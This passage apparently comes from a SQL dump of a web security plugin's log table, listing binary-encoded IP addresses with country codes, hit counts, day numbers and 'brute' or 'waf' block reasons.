0��N.��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��N/ɏ','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��N���','TR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��N�(�','IR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Oe,','RS',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��O���','RU',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��O���','RU',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��PBʷ','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��P�Ҕ','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��\Z','PT',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��\Z','PT',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��P��o','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��QDD�','CN',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��QE8/','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��QEˣ','CN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4\Z','IT',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4r','IT',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��QX4�','IT',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q��~','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q�','PL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q�2','BE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q���','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��R@�','FR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��R�,�','RU',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��T�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ul\"','PL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ul\"','PL',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��UoB�','TR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��UoB�','TR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��U���','PL',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��U��E','PL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��U��\\','PL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��V9�e','BY',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wb��','FR',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wb��','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wb��','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��Wb��','FR',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc`','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�/','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc�/','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Xc��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y.m�','IT',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y/:','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y/:','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y`Z}','IT',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��~','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y���','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y���','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��M','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��M','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��M','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y��9','TR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��[ySC','FR',2,18858,'waf'),('\0\0\0\0\0\0\0\0\0\0��[�{�','BE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��','PL',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�[�','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�[�','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�[�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�ȷ','UA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��[��Z','UA',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�|�','UA',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�|�','UA',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��[�<l','UA',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\>cc','EE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\>cc','EE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\>cc','EE',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\>cc','EE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\>cc','EE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\��','FR',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\��','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\��','FR',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\��','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo\"','GB',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo6','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qod','GB',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��]qo�','GB',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��]r��','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��]sO','TR',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��]�{�','GR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��]���','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��]���','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��]��','AT',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��^+.','AZ',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��^)�','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��^)�','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��^)�','FR',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��','NL',2,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�x','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�x','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�x','FR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�|�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��W','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��W','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o��','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o��','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��_o��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�+�','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��_կ�','RU',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�4e','PL',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��_ء�','FI',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�� ','FI',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��[','FI',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','FI',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��`}��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��e \Z�','HK',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��e \Z�','HK',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��e >�','HK',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��e ��','HK',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��e%�','CN',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��fB�','ZA',1,18856,'waf'),('\0\0\0\0\0\0\0\0\0\0��f�vk','ZA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��f�vk','ZA',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�k','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','MY',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��gF','MY',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gF','MY',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��g	��','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ge�','HK',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��g%�','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��g1?','AU',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��g8�','ID',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*:f','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g*o;','AU',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��g/<,','ID',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g9ݲ','VN',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��g9ݲ','VN',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��gI��','IN',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��gK��','VN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��gPR!','ID',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gV�]','IN',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��gXzu','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�(','VN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�(','VN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ�j','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��gZ��','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��g\\�z','IN',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��g]�','IN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��gk�s','VN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��gm','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gt�','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx��','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��gx��','IN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��gzj�','ID',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��g{?','ID',10,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��g|^,','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|_Y','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g|_Y','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','TW',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��E','TW',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ڲ','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�p','VN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�.�','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�ʖ','ID',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��R','BD',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��R','BD',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\n�','ID',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�I�','VN',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�i�','IN',1,18854,'waf'),('\0\0\0\0\0\0\0\0\0\0��g�','',2,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��g���','SC',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��g���','SC',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�y�','IN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�t�','ID',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�<�','IN',1,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��g⋙','ID',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\Z','ID',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�\Z','ID',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��h+�5','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h+�5','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��h-)-','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�DC','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��:','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��:','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��:','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\0','BE',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�w�','BE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�+�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�i�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�\Z','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��hƬD','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�x','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�v','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�I+','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��h���','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��j\\�','CN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��j4��','CN',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��j5s}','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��jK��','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��jK��','CN',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��','NL',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��\n','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�X)','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�g�','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��k���','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��2','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��l:�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','CA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��l���','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��l�,r','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��m��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��ml�','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ml��','GB',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��m{G�','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�\Z','FR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��m�\Z','FR',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-','MY',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-p','MY',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-p','MY',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��n-�','MY',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��n%�t','PK',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��n��','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��n�!�','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]5�','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��o]5�','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��o�F','CN',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��o�F','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��p��#','KR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��p�H�','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��r!Z','TW',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��sW�','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��sW�','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��t2~','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��t2~','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��t2~','SG',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��t>f�','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˖G','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��t˻�','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','DE',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��t���','CN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��u2Z','CN',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��u2Z','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��vHh','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��vE��','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��vE��','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��w��','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��w��','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��w��','SG',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��w4�','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��w��','JP',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��w�','JP',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��xO�','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��y��','CN',1,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0��zrL�','CN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\